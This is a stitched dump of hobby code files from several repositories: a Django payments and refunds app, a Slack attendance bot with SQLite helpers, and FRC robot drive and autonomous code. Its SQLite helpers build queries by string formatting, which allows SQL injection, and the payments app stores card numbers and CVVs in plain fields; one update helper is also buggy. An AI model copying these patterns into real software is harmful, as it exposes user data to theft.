'payment_id': forms.TextInput(attrs={'readonly': 'readonly'}),
'number': forms.NumberInput(attrs={'class': 'form-control', 'min': 1111111111111111, 'placeholder': 1111111111111111}),
'name': forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'John Doe'}),
'expiration_month': forms.NumberInput(attrs={'class': 'form-control', 'max': 12, 'min': 1}),
'expiration_year': forms.NumberInput(attrs={'class': 'form-control', 'min': 2021}),
'cvv': forms.NumberInput(attrs={'class': 'form-control', 'max': 999}),
}
class MbWayForm(ModelForm):
class Meta:
model = MbWay
fields = '__all__'
widgets = {
'payment_id': forms.TextInput(attrs={'readonly': 'readonly'}),
'phone_number': forms.NumberInput(attrs={'class': 'form-control', 'maxlength': 9, 'placeholder': 910000000})
}
| {"/payments_app/payments/views.py": ["/payments_app/payments/models.py"], "/refunds_app/refunds/views.py": ["/refunds_app/refunds/models.py"], "/refunds_app/refunds/admin.py": ["/refunds_app/refunds/models.py"], "/payments_app/payments/admin.py": ["/payments_app/payments/models.py"]} |
53,530 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /refunds_app/refunds/admin.py | from django.contrib import admin
from .models import Refund
# Register your models here.
admin.site.register(Refund) | {"/payments_app/payments/views.py": ["/payments_app/payments/models.py"], "/refunds_app/refunds/views.py": ["/refunds_app/refunds/models.py"], "/refunds_app/refunds/admin.py": ["/refunds_app/refunds/models.py"], "/payments_app/payments/admin.py": ["/payments_app/payments/models.py"]} |
53,531 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /payments_app/payments/admin.py | from django.contrib import admin
from .models import Base, CreditCard, MbWay
# Register your models here.
admin.site.register(Base)
admin.site.register(CreditCard)
admin.site.register(MbWay)
| {"/payments_app/payments/views.py": ["/payments_app/payments/models.py"], "/refunds_app/refunds/views.py": ["/refunds_app/refunds/models.py"], "/refunds_app/refunds/admin.py": ["/refunds_app/refunds/models.py"], "/payments_app/payments/admin.py": ["/payments_app/payments/models.py"]} |
53,532 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /payments_app/payments/migrations/0002_auto_20210914_1405.py | # Generated by Django 2.2.12 on 2021-09-14 14:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('payments', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='mbway',
name='payment_id',
),
migrations.AlterField(
model_name='base',
name='payment_method',
field=models.CharField(choices=[('credit_card', 'credit_card'), ('mbway', 'mbway')], max_length=50),
),
migrations.AlterField(
model_name='base',
name='status',
field=models.CharField(choices=[('success', 'success'), ('error', 'error'), ('settled', 'settled')], max_length=20),
),
migrations.DeleteModel(
name='CreditCard',
),
migrations.DeleteModel(
name='MbWay',
),
]
| {"/payments_app/payments/views.py": ["/payments_app/payments/models.py"], "/refunds_app/refunds/views.py": ["/refunds_app/refunds/models.py"], "/refunds_app/refunds/admin.py": ["/refunds_app/refunds/models.py"], "/payments_app/payments/admin.py": ["/payments_app/payments/models.py"]} |
53,533 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /payments_app/payments/migrations/0004_auto_20210918_1404.py | # Generated by Django 2.2.12 on 2021-09-18 14:04
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('payments', '0003_creditcard_mbway'),
]
operations = [
migrations.AlterField(
model_name='base',
name='payment_method',
field=models.CharField(choices=[('credit_card', 'credit_card'), ('mbway', 'mbway')], default='credit_card', max_length=50),
),
migrations.AlterField(
model_name='base',
name='settled_amount',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='base',
name='settled_at',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='creditcard',
name='payment_id',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='payments.Base'),
),
migrations.AlterField(
model_name='mbway',
name='payment_id',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='payments.Base'),
),
]
| {"/payments_app/payments/views.py": ["/payments_app/payments/models.py"], "/refunds_app/refunds/views.py": ["/refunds_app/refunds/models.py"], "/refunds_app/refunds/admin.py": ["/refunds_app/refunds/models.py"], "/payments_app/payments/admin.py": ["/payments_app/payments/models.py"]} |
53,534 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /refunds_app/refunds/models.py | from django import forms
from django.db import models
from django.forms.models import ModelForm
import uuid
class Refund(models.Model):
refund_id = models.UUIDField(max_length=200, primary_key=True, default=uuid.uuid4)
payment_id = models.CharField(max_length=200, default='v')
created_at = models.DateTimeField(auto_now_add=True)
amount = models.FloatField()
def __str__(self):
return "Refund ID:" + str(self.refund_id) + ", Payment ID: " + str(self.payment_id) + ", Created at: " + str(self.created_at) + ", Amount: " + str(self.amount) + "€\n"
class RefundForm(ModelForm):
class Meta:
model = Refund
fields = '__all__'
widgets = {
'refund_id': forms.TextInput(attrs={'readonly': 'readonly', 'class': 'form-control'}),
'payment_id': forms.TextInput(attrs={'readonly': 'readonly', 'class': 'form-control'}),
'amount': forms.NumberInput(attrs={'class': 'form-control', 'min': 1, 'placeholder': 0}),
} | {"/payments_app/payments/views.py": ["/payments_app/payments/models.py"], "/refunds_app/refunds/views.py": ["/refunds_app/refunds/models.py"], "/refunds_app/refunds/admin.py": ["/refunds_app/refunds/models.py"], "/payments_app/payments/admin.py": ["/payments_app/payments/models.py"]} |
53,551 | greg-smith1/Big_Bot | refs/heads/master | /attendance.py | import os
import time
from pprint import pprint
from slackclient import SlackClient
# instantiate Slack client
slack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN'))
# Bytebot's user ID in Slack: value is assigned after the bot starts up
starterbot_id = None
# constants
RTM_READ_DELAY = 3 # 1 second delay between reading from RTM
def attendance_protocol(hour, cohorts):
"""
Executes bot command if the command is known
"""
sent_attendance = []
date = time.strftime("%Y_%m_%d")
for cohort in cohorts:
channel, msg_time = post_attendance(channel=cohort[1], cohort_name=cohort[0])
sent_attendance.append((channel, msg_time, cohort[0]))
time.sleep(600)
with open('attendance_{}.csv'.format(date), 'a+') as a_report:
a_report.write('name,time,cohort,date\n')
for attendance in sent_attendance:
response_json = take_attendance(channel=attendance[0], ts=attendance[1])
print(len(response_json))
attendance_report = []
for _ in range(len(response_json)):
(attendance_report.append(response_json[_]["users"]))
print(attendance_report)
try:
for user in attendance_report:
name = (slack_client.api_call(
"users.info",
user=user[0]
)['user']['real_name'])
print(name)
a_report.write('{},{},{},{}\n'.format(name, hour, attendance[2], date))
except:
print('No check-ins recorded')
print('\nCSV Written!!\n')
#acceptance = slide_staff_dms('U8BE9UNHF')
def post_attendance(channel, cohort_name):
"""
Posts attendance message in given channel id
"""
attendance_message = "{}, please check in with an emoji response below! \
(Only one response each, please)".format(cohort_name)
msg_ts = slack_client.api_call(
"chat.postMessage",
channel=channel,
text=attendance_message,
icon_emoji=':byte:')["ts"],
return(channel, msg_ts)
def take_attendance(channel, ts):
"""
Parses attendance message for reactions
"""
try:
attendance = slack_client.api_call(
"reactions.get",
channel="{}".format(channel),
timestamp="{}".format(ts)
)["message"]["reactions"]
return attendance
except:
print('No check-ins recorded so far')
return []
def get_channels():
"""
Obtains list of channels ByteBot has been added to on startup
"""
my_channels = []
channels = slack_client.api_call(
"channels.list",
exclude_archived='true',
exclude_members='true'
)["channels"]
for channel in channels:
if channel["is_member"]:
my_channels.append((channel['name'], channel['id']))
return my_channels
def slide_staff_dms(slack_id):
"""
Slide's into Greg's DMs and asks him to sign off
on attendance (*debugging/alpha version only*)
"""
user_name = slack_client.api_call(
"users.info",
user=slack_id
)['user']['real_name']
response = "Heyyy"
slack_client.api_call(
"chat.postMessage",
channel=slack_id,
text=response,
attachments=[
{
"text": "Sign off below",
"fallback": "You need to sign off for submission",
"callback_id": "attendance_signoff",
"color": "#3AA3E3",
"attachment_type": "default",
"actions": [
{
"name": "option",
"text": "Yes",
"type": "button",
"value": "yes"
},
{
"name": "option",
"text": "No",
"type": "button",
"value": "no"
}
]
}
],
username='ByteBot',
icon_emoji=':byte:')
def get_usr_info(user_id):
response = slack_client.api_call(
"users.info",
user=user_id
)
return response
| {"/Clementine.py": ["/attendance.py", "/quizzes.py", "/interactions.py"]} |
53,552 | greg-smith1/Big_Bot | refs/heads/master | /model.py | #!usr/bin/env python3
import sqlite3
import pandas as pd
def lookup_student(first_name, last_name=None):
connection = sqlite3.connect('byte_master.db', check_same_thread = False)
cursor = connection.cursor()
first_name = str(first_name.title())
try:
last_name = str(last_name.title())
cursor.execute("SELECT * FROM students WHERE first_name = '{}' AND last_name = '{}';".format(
first_name, last_name))
rows = pd.DataFrame(cursor.fetchall(), columns=['pk', 'first_name','last_name',
'slack_id', 'email', 'phone_num', 'github_id', 'cohort', 'week', 'length',
'birthday', 'course_type', 'project_1', 'doc_1', 'project_2', 'doc_2', 'absences'])
except:
cursor.execute("SELECT * FROM students WHERE first_name = '{}';".format(first_name))
rows = pd.DataFrame(cursor.fetchall(), columns=['pk', 'first_name','last_name',
'slack_id', 'email', 'phone_num', 'github_id', 'cohort', 'week', 'length',
'birthday', 'course_type', 'project_1', 'doc_1', 'project_2', 'doc_2', 'absences'])
rows.set_index('pk', inplace=True)
# rows = rows.reset_index(drop = True, inplace = True)
print(rows)
rows = rows.to_html()
# print(rows)
return rows
def lookup_cohort(name):
cohort_name = str(name.lower())
connection = sqlite3.connect('byte_master.db', check_same_thread = False)
cursor = connection.cursor()
cursor.execute("SELECT * FROM cohorts WHERE name= '{}';".format(cohort_name))
cohort = pd.DataFrame(cursor.fetchall(), columns=['pk', 'name','start',
'end', 'week', 'start_students', 'end_students', 'slack_channel'])
cohort_id = cohort['pk'][0]
cursor.execute("SELECT * FROM students WHERE cohort = {};".format(cohort_id))
students = pd.DataFrame(cursor.fetchall(), columns=['pk', 'first_name','last_name',
'slack_id', 'email', 'phone_num', 'github_id', 'cohort', 'week', 'length',
'birthday', 'course_type', 'project_1', 'doc_1', 'project_2', 'doc_2', 'absences'])
cohort.set_index('pk', inplace=True)
students.set_index('pk', inplace=True)
# row = row.reset_index(drop = True, inplace = True)
print(cohort)
print('\n')
print(students)
cohort = cohort.to_html()
students = students.to_html()
# print(rows)
return cohort, students
def add_student(fn, ln, slack, email, phone, gh_id, cohort, week, length,
birthday, course, proj1, doc1, proj2, doc2, absences):
connection = sqlite3.connect('byte_master.db', check_same_thread = False)
cursor = connection.cursor()
print(fn, ln, slack, email, phone, gh_id, cohort, week, length, birthday,
course, proj1, doc1, proj2, doc2, absences)
sql_command = """INSERT INTO students(
first_name,last_name,slack_id,email,phone,github_id,cohort,week,
length,birth_date,course,project_1,doc_1,project_2,doc_2,absences
) VALUES(
'{}','{}','{}','{}','{}','{}',{},{},{},'{}','{}','{}',{},
'{}',{},{});""".format(fn, ln, slack, email, phone, gh_id, cohort,
week, length, birthday, course, proj1, doc1, proj2, doc2, absences)
print(sql_command)
try:
cursor.execute(sql_command)
connection.commit()
cursor.close()
return True
except:
return False
def add_cohort(name,start,end,week,start_students,end_students,slack_channel):
connection = sqlite3.connect('byte_master.db', check_same_thread = False)
cursor = connection.cursor()
print(name,start,end,start_students,end_students,slack_channel)
sql_command = """INSERT INTO cohorts(
name,start,end,week,start_students,end_students,slack_channel
) VALUES(
'{}','{}','{}',{},{},{},'{}');""".format(name,start,end,week,
start_students,end_students,slack_channel)
print(sql_command)
try:
cursor.execute(sql_command)
connection.commit()
cursor.close()
return True
except:
return False
def add_quiz(prompt,github_link):
connection = sqlite3.connect('byte_master.db', check_same_thread = False)
cursor = connection.cursor()
print(prompt,github_link)
sql_command = """INSERT INTO quizzes(prompt,github_link) VALUES(
'{}','{}');""".format(prompt,github_link)
print(sql_command)
try:
cursor.execute(sql_command)
connection.commit()
cursor.close()
return True
except:
return False
def add_topics(topic_1, topic_2, topic_3, topic_4, topic_5, topic_6, topic_7, topic_8):
connection = sqlite3.connect('byte_master.db', check_same_thread = False)
cursor = connection.cursor()
print(topic_1, topic_2, topic_3, topic_4, topic_5, topic_6, topic_7, topic_8)
sql_command = """INSERT INTO presentations(topic_1, topic_2, topic_3,
topic_4, topic_5, topic_6, topic_7, topic_8) VALUES(
'{}','{}','{}','{}','{}','{}','{}','{}');""".format(topic_1,
topic_2, topic_3, topic_4, topic_5, topic_6, topic_7, topic_8)
print(sql_command)
try:
cursor.execute(sql_command)
connection.commit()
cursor.close()
return True
except:
return False
def edit_db(table, column, value, id_):
connection = sqlite3.connect('byte_master.db', check_same_thread = False)
cursor = connection.cursor()
sql_command = """UPDATE {table} SET {column} = '{value}' WHERE pk = {id_};""".format(table, column, value, id_)
try:
cursor.execute(sql_command)
connection.commit()
cursor.close()
return True
except:
return False
| {"/Clementine.py": ["/attendance.py", "/quizzes.py", "/interactions.py"]} |
53,553 | greg-smith1/Big_Bot | refs/heads/master | /Clementine.py | import os
import sys
import time
import schedule
import threading
import re
import random
from pprint import pprint
from slackclient import SlackClient
from attendance import *
from quizzes import *
from interactions import *
# instantiate Slack client
slack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN'))
# Bytebot's user ID in Slack: value is assigned after the bot starts up
starterbot_id = None
# constants
VERSION = 'Clementine'
EXAMPLE_COMMAND = "do"
MENTION_REGEX = "^<@(|[WU].+?)>(.*)"
DELAY = 3 # 1 second delay between reading from RTM
def run_threaded(job_func):
job_thread = threading.Thread(target=job_func)
job_thread.start()
def job_1():
print('job1')
attendance_protocol('10:00', cohorts=my_channel_list)
def job_2():
attendance_protocol('1:00', cohorts=my_channel_list)
if __name__ == "__main__":
if slack_client.rtm_connect():
print("ByteBot connected and running!")
# Read bot's user ID by calling Web API method `auth.test`
starterbot_id = slack_client.api_call("auth.test")["user_id"]
print(starterbot_id)
my_channel_list = get_channels()
print(my_channel_list)
#pprint(get_usr_info('U1K2NBXUG'))
#prompt = obtain_quiz(1)
#dispatch_quiz(prompt, 'U1K2NBXUG')
#dispatch_quiz(prompt, 'U8BE9UNHF')
schedule.every().monday.at("10:00").do(run_threaded, job_1)
schedule.every().tuesday.at("10:00").do(run_threaded, job_1)
schedule.every().wednesday.at("10:00").do(run_threaded, job_1)
schedule.every().thursday.at("10:00").do(run_threaded, job_1)
schedule.every().friday.at("10:00").do(run_threaded, job_1)
schedule.every().monday.at("13:00").do(run_threaded, job_2)
schedule.every().tuesday.at("13:00").do(run_threaded, job_2)
schedule.every().wednesday.at("13:00").do(run_threaded, job_2)
schedule.every().thursday.at("13:00").do(run_threaded, job_2)
schedule.every().friday.at("13:00").do(run_threaded, job_2)
while 1:
command, channel = parse_bot_commands(slack_client.rtm_read(), starterbot_id)
if command:
print('command!!!!!')
run_threaded(handle_command(command, channel, starterbot_id))
schedule.run_pending()
#slide_staff_dms('U8BE9UNHF')
#slide_staff_dms('U1K2NBXUG')
time.sleep(DELAY)
else:
print("Connection failed. Exception traceback printed above.")
| {"/Clementine.py": ["/attendance.py", "/quizzes.py", "/interactions.py"]} |
53,554 | greg-smith1/Big_Bot | refs/heads/master | /quizzes.py | import sqlite3
import os
from slackclient import SlackClient
slack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN'))
def get_slack_ids(week):
connection = sqlite3.connect('byte_master.db', check_same_thread = False)
cursor = connection.cursor()
cursor.execute("SELECT FROM quizzes WHERE pk= '{}';".format(week))
ids = cursor.fetchall()
print(ids)
return ids
def obtain_quiz(week):
connection = sqlite3.connect('byte_master.db', check_same_thread = False)
cursor = connection.cursor()
cursor.execute("SELECT * FROM quizzes WHERE pk= '{}';".format(week))
quiz = cursor.fetchone()[1]
print(quiz)
return quiz
def dispatch_quiz(prompt, slack_id):
slack_client.api_call(
"chat.postMessage",
channel=slack_id,
text=prompt,
username='ByteBot',
icon_emoji=':python:'
)
| {"/Clementine.py": ["/attendance.py", "/quizzes.py", "/interactions.py"]} |
53,555 | greg-smith1/Big_Bot | refs/heads/master | /interactions.py | import os
import time
import re
import schedule
import random
import sys
from slackclient import SlackClient
# instantiate Slack client
slack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN'))
# Bytebot's user ID in Slack: value is assigned after the bot starts up
#starterbot_id = None
# constants
VERSION = 'Clementine'
RTM_READ_DELAY = 3 # 1 second delay between reading from RTM
EXAMPLE_COMMAND = "do"
MENTION_REGEX = "^<@(|[WU].+?)>(.*)"
def parse_bot_commands(slack_events, starter_id):
"""
Parses a list of events coming from the Slack RTM API to find bot commands.
If a bot command is found, this function returns a tuple of command and channel.
If its not found, then this function returns None, None.
"""
for event in slack_events:
print(event)
if event["type"] == "message" and not "subtype" in event:
user_id, message = parse_direct_mention(event["text"])
if user_id == starter_id:
return message, event["channel"]
return None, None
def parse_direct_mention(message_text):
"""
Finds a direct mention (a mention that is at the beginning) in message text
and returns the user ID which was mentioned. If there is no direct mention, returns None
"""
matches = re.search(MENTION_REGEX, message_text)
# the first group contains the username, the second group contains the remaining message
return (matches.group(1), matches.group(2).strip()) if matches else (None, None)
def handle_command(command, channel, starter_id):
"""
Executes bot command if the command is known
"""
print('Command found!!')
post=True
username = 'ByteBot'
emoji = ':byte:'
"""
reply_user = slack_client.api_call(
"users.info",
user=sending_user
)['user']['real_name']
"""
# Default response is help text for the user
default_response = "Not sure what you mean. Try *{}* or *{}*.".format('hi', 'status')
# Finds and executes the given command, filling in response
response = None
# This is where you start to implement more commands!
if command.startswith(EXAMPLE_COMMAND):
response = "Sure...write some more code then I can do that!"
elif command.startswith('explain attendance'):
username = 'attendancebot'
emoji = ':slack:'
slack_client.api_call(
"chat.postMessage",
channel=channel,
text='Ok! I\'ll be taking attendance tomorrow, let me explain \
how that\'ll work....',
username=username,
icon_emoji=emoji)
time.sleep(2)
response = 'Tomorrow around 10:00 I\'ll post a message in \
your channel. All you have to do is respond with an emoji (any emoji \
will do) and I\'ll collect the responses a little bit later. If you \
have any other questions, ask Greg!'
elif command.startswith('hello') or command.startswith('hi'):
response = 'Hi!!'
elif command.startswith("how are you"):
response_list = ['Fine.', 'Bored', 'Waiting for a real command', 'Jaded', ':face_vomiting:']
response = random.choice(response_list)
elif command.startswith("say hi"):
response = "Hi. But shouldn't you get me logging attendance?"
elif command.startswith("status"):
my_name = os.path.basename(sys.argv[0]).split('.')[0]
process = os.getpid()
username = str(my_name)
emoji = ':slack:'
response = "ByteBot Online.\nVersion: {}\nPID: {}\nSlack ID: {}".format(VERSION, process, starter_id)
# Sends the response back to the channel
elif command.startswith('analysis'):
pass
elif command.startswith('lookup Greg'):
print(slack_client.api_call(
"users.info",
user='U8BE9UNHF'
)['user']['real_name'])
response = 'Looked Greg up (check your terminal)'
elif command.startswith('help'):
slide('U8BE9UNHF')
post=False
if post==True:
slack_client.api_call(
"chat.postMessage",
channel=channel,
text=response or default_response,
username=username,
icon_emoji=emoji
)
def slide(user_id):
"""
Sends Bytebot to DM a user
"""
user_name = slack_client.api_call(
"users.info",
user=user_id
)['user']['real_name']
response = "Heyy"
slack_client.api_call(
"chat.postMessage",
channel=user_id,
text=response,
username='ByteBot',
icon_emoji=':python:'
)
| {"/Clementine.py": ["/attendance.py", "/quizzes.py", "/interactions.py"]} |
53,565 | wylliec/2015-recycle-rush | refs/heads/master | /kiwidrive/strategies.py | import math
import kiwidrive.parallel_generators as pg
class TurnStrategy:
def __init__(self, robot):
self.robot = robot
self.robot.strategies['tote'] = self
def autonomousInit(self):
self.auto = pg.ParallelGenerators()
self.auto.add("back_left", self.turn_back_left())
self.auto.add("forward1", self.forward1(), after="back_left")
self.auto.add("brake1", self.brake1(), after="forward1")
self.auto.add("forward_left", self.turn_forward_left(), after="brake1")
self.auto.add("wait", self.wait(), after="forward_left")
def auto_tote_periodic(self):
for x in self.turn_back_left():
yield
def forward1(self):
for i in range(140):
self.robot.forward(0.5)
yield
def brake1(self):
for i in range(15):
self.robot.forward(-0.5)
yield
def wait(self):
while True:
self.robot.forward(0)
yield
def turn_back_left(self):
angle0 = self.robot.gyro.getAngle()
settle_count = 0
while True:
angle = self.robot.gyro.getAngle()
anglediff = (angle0 + 90) - angle
if abs(anglediff) < 3:
settle_count += 1
else:
settle_count = 0
if settle_count > 20:
break
val = -0.08 * anglediff
if val > 0.5:
val = 0.5
if val < -0.5:
val = -0.5
self.robot.left_motor.set(0)
self.robot.right_motor.set(val)
yield
def turn_forward_left(self):
angle0 = self.robot.gyro.getAngle()
settle_count = 0
while True:
angle = self.robot.gyro.getAngle()
anglediff = (angle0 - 90) - angle
if abs(anglediff) < 3:
settle_count += 1
else:
settle_count = 0
if settle_count > 20:
break
val = -0.08 * anglediff
if val > 0.5:
val = 0.5
if val < -0.5:
val = -0.5
self.robot.left_motor.set(0)
self.robot.right_motor.set(val)
yield
class Auto3StraightStrategy:
def __init__(self, robot):
self.robot = robot
self.robot.strategies['3-tote-straight'] = self
def autonomousInit(self):
auto = pg.ParallelGenerators()
self.robot.claw_down()
self.winch_value = 0.0
auto.add("claw", self.robot.maintain_claw())
auto.add("winch", self.maintain_winch())
auto.add("pickup1", self.auto_pickup_tote())
auto.add("drive1", self.auto_drive_until_tote(), after="pickup1")
auto.add("drop1", self.drop_tote(1), after="drive1")
auto.add("drive1.5", self.auto_drive_until_liftable(), after="drop1")
auto.add("pickup2", self.auto_pickup_tote(), after="drive1.5")
auto.add("drive2", self.auto_drive_until_tote(), after="pickup2")
auto.add("drop2", self.drop_tote(2), after="drive2")
auto.add("drive2.5", self.auto_drive_until_liftable(), after="drop2")
auto.add("pickup3", self.auto_pickup_tote(), after="drive2.5")
self.auto = auto
def autonomousPeriodic(self):
self.auto.next()
def auto_pickup_tote(self):
robot = self.robot
assert robot.get_winch_revs() < 20
tote_revs = 330
robot.winch_setpoint = robot.winch_setpoint_zero + tote_revs
durped = False
while robot.get_winch_revs() < robot.winch_setpoint:
if not durped and robot.get_winch_revs() >= 70:
robot.claw_up()
durped = True
self.winch_value = 1.0
yield
self.winch_value = 0.0
yield
def auto_drive_until_tote(self):
robot = self.robot
revs0 = robot.right_encoder.get()
while True:
val = robot.right_encoder.get()
if val > revs0 + 306:
break
robot.forward(0.5)
yield
yield
def maintain_winch(self):
while True:
self.robot.winch_set(self.winch_value)
yield
def auto_drive_until_liftable(self):
robot = self.robot
revs0 = robot.right_encoder.get()
while robot.right_encoder.get() <= revs0 + 60:
robot.forward(0.5)
yield
def drop_tote(self, i):
robot = self.robot
robot.winch_setpoint = robot.winch_setpoint_zero
while robot.get_winch_revs() > robot.winch_setpoint_zero + 10:
self.winch_value = -1.0
if robot.get_winch_revs() < robot.winch_setpoint_zero + 290 and \
("drop%s" % i) in self.auto.generators:
self.auto.add("back", self.backup())
# put drivei.5 behind "back"
x = self.auto.afters["drop%s" % i].pop()
assert x[0] == ("drive%s.5" % i)
self.auto.afters["back"] = [x]
yield
robot.claw_down()
self.winch_value = 0.0
yield
def backup(self):
for i in range(30):
self.robot.forward(-0.4)
yield
class ContainerStrategy:
def __init__(self, robot):
self.robot = robot
self.robot.strategies['container'] = self
def autonomousInit(self):
self.auto_state = "start"
self.positioned_count = 0
def autonomousPeriodic(self):
"""
Autonomous mode for picking up recycling containers
Note: run variable "auto_mode" should be set to "container"
Current implementation can also pick up and score a single tote
"""
robot = self.robot
# state "start": claw should be down to pick up totes/containers
if self.auto_state == "start":
robot.claw_down()
robot.set_claw()
self.auto_state = "lift"
# state "lift": lift up to pick up container
if self.auto_state == "lift":
if robot.get_winch_revs() < 500:
robot.winch_motor.set(.5)
else:
self.auto_state = "clawout"
# state "clawout": push out solenoid
if self.auto_state == "clawout":
robot.claw_up()
robot.set_claw()
self.auto_state = "turn"
# do i want to do a 180 degree turn here?
if self.auto_state == "turn":
done_turning = self.turn_brake(180)
if done_turning:
self.auto_state = "drive"
# state "drive": drive over the bump
if self.auto_state == "drive":
if self.positioned_count < 190:
robot.forward(.6)
self.positioned_count += 1
robot.winch_motor.set(0.1 -
0.01 * (robot.get_winch_revs() - 500))
else:
self.positioned_count = 0
self.auto_state = "setdown"
# state "setdown": set container down
if self.auto_state == "setdown":
if robot.get_winch_revs() > 15:
robot.winch_motor.set(-.5)
robot.brake_linear()
else:
robot.winch_motor.set(0)
self.auto_state = "clawin"
# state "clawin": claw should be down to release tote/container
if self.auto_state == "clawin":
robot.claw_down()
robot.set_claw()
self.auto_state = "wait"
# state "wait": waits for the claw to pull away from the tote
if self.auto_state == "wait":
if self.positioned_count < 20:
self.positioned_count += 1
else:
self.positioned_count = 0
self.auto_state = "backup"
# state "backup": back up
if self.auto_state == "backup":
if self.positioned_count < 15:
robot.forward(-1)
self.positioned_count += 1
else:
self.positioned_count = 0
self.auto_state = "finished"
# Simplest turn algorithm
# Returns whether it is done turning
def turn_brake(self, angle):
if abs(self.robot.gyro.getAngle()) % 360 < angle:
self.robot.pivot_clockwise(1)
elif abs(self.robot.gyro.getRate()) > .01:
self.robot.brake_rotation()
else:
return True
return False
# Turn should have a slow down so it stops at angle perfectly
def turn(self, angle):
slow_down_angle = 30
remaining_angle = angle - abs(self.robot.gyro.getAngle()) % 360
if abs(remaining_angle) < 1 and abs(self.robot.gyro.getRate()) < .1:
return True
elif abs(remaining_angle) > slow_down_angle:
value = 1
else:
value = (math.sin(remaining_angle *
(180/slow_down_angle) - 90) + 1) / 2
value = math.copysign(value, remaining_angle)
self.robot.pivot_clockwise(value)
return False
| {"/kiwidrive/kiwi.py": ["/kiwidrive/strategies.py"], "/kiwidrive/robot.py": ["/kiwidrive/kiwi.py"]} |
53,566 | wylliec/2015-recycle-rush | refs/heads/master | /kiwidrive/kiwi.py | import math
import wpilib
import kiwidrive.xbox as joy
import kiwidrive.strategies as strats
try:
import numpy as np
M = np.array(
[[-1.6, 0.0],
[ 1.0, -1.0 / math.sqrt(3)],
[ 1.0, 1.0 / math.sqrt(3)]])
except ImportError:
print("no numpy; hope you aren't trying to use kiwidrive")
def get_wheel_magnitudes(v, m=None):
"""
Calculate the magnitudes to drive wheels 1, 2, and 3
to drive the robot in the direction defined by normalized
vector v=[x,y]
"""
if m is None:
m = M
return np.dot(m, v)
def normalize_joystick_axes(x, y):
"""
A joystick axis returns a value in the range [-1.0 .. 1.0]
Then two joystick axes (x direction, y direction) give us a
"unit square". We want a unit circle - i.e. the angle is preserved,
but the magnitude is the same for any angle.
Return (x, y) the scaled x, y components
"""
magnitude = math.hypot(x, y)
side = max(abs(x), abs(y))
if magnitude == 0.0:
return 0.0, 0.0
return x * side / magnitude, y * side / magnitude
def step(value, min_val):
"""
Returns "value" unless its less than "min", then it returns 0
"""
if abs(value) < min_val:
value = 0
return value
class Smooth:
"""
Class to maintain state for slow start up and slow down of motors
to reduce jerkiness
"""
def __init__(self, val, stp):
self.value = val
self.step = stp
def set(self, new_val):
if self.value < new_val:
self.value = min(self.value + self.step, new_val)
else:
self.value = max(self.value - self.step, new_val)
return self.value
def force(self, new_val):
self.value = new_val
return self.value
class KiwiDrive:
def __init__(self, joystick, motors):
"""
Initialize all of the sensors and controllers on the robot
"""
# Initialize the Joystick
self.joy = joy.XboxController(joystick)
# Initialize the drive motors
assert len(motors) == 3
self.motors = motors
self.tweaks = [1, 1, 1]
# modify values for better driving
self.m = np.copy(M)
self.m[:, 1] *= 1.3 # make forward a bit faster
self.m[:, 0] *= 0.8 # make strafe a bit slower
self.motor_bias = 0.8
# Initialize the arm motor
self.arm_motor = wpilib.Talon(4)
self.arm_power = Smooth(0.0, 0.01)
# Initialize the winch motor
self.winch_motor = wpilib.Talon(3)
# Initialize the winch encoder
self.winch_encoder = wpilib.Encoder(1, 2)
self._winch_encoder_min = 8
self.last_winch_signal = 0
# Initialize the compressor
self.compressor = wpilib.Compressor(0)
# Initialize the compressor watchdog
self.dog = wpilib.MotorSafety()
# self.dog.setExpiration(1.75)
self.dog.setSafetyEnabled(False)
# Initialize the pneumatic solenoids for the claw
self.solenoid1 = wpilib.Solenoid(1)
self.solenoid2 = wpilib.Solenoid(2)
self.claw_state = True
self.claw_toggle = False
# Initialize the accelerometer
self.accel = wpilib.BuiltInAccelerometer()
# Initialize the gyro
self.gyro = wpilib.Gyro(0)
# Initialize the PID Controller
self.pid_correction = 0.0
self.last_rot = 0.0
self.last_angle = 0
self.last_angle_count = 0
self.waiting_to_reenable = False
self.pidcontroller = wpilib.PIDController(
0.015,
0.0,
0.0,
.1,
lambda: self.getAngle(),
lambda output: self.pidWrite(output),
)
self.pidcontroller.setAbsoluteTolerance(5)
# Initialize autonomous strategies
self.strategies = {}
strats.Auto3StraightStrategy(self)
strats.TurnStrategy(self)
strats.ContainerStrategy(self)
def autonomousInit(self, auto_mode):
"""
Runs an autonomous mode method based on the selected mode
"""
assert auto_mode in [
"container",
"tote",
"3-tote-straight",
]
self.auto_mode = auto_mode
self.winch_setpoint_zero = self.winch_setpoint = self.get_winch_revs()
self.strategies[self.auto_mode].autonomousInit()
self.compressor.start()
def autonomousPeriodic(self):
"""
Runs an autonomous mode method based on the selected mode
"""
self.dog.feed()
self.strategies[self.auto_mode].autonomousPeriodic()
def maintain_claw(self):
while True:
self.set_claw()
yield
def maintain_winch(self):
while True:
self.winch_set(0)
yield
def get_winch_revs(self):
return -self.winch_encoder.get()
def winch_encoder_min(self):
return self._winch_encoder_min
def winch_encoder_max(self):
return self._winch_encoder_min + 1162
def forward(self, val):
self.RawDrive(0, val, 0)
def pivot_clockwise(self, val):
self.RawDrive(0, 0, val)
def Enable(self):
self.pidcontroller.setSetpoint(self.getAngle())
self.pidcontroller.enable()
self.winch_setpoint = self.get_winch_revs()
self.compressor.start()
def Disable(self):
self.pidcontroller.disable()
self.compressor.stop()
def getAngle(self):
return int(self.gyro.pidGet())
def Drive(self):
x = self.joy.analog_drive_x()
y = self.joy.analog_drive_y()
# rot is +1.0 for right trigger, -1.0 for left
rot = self.joy.analog_rot()
self.RawDrive(x, y, rot)
# Feed winch controller raw values from the joystick
winch_signal = self.joy.analog_winch()
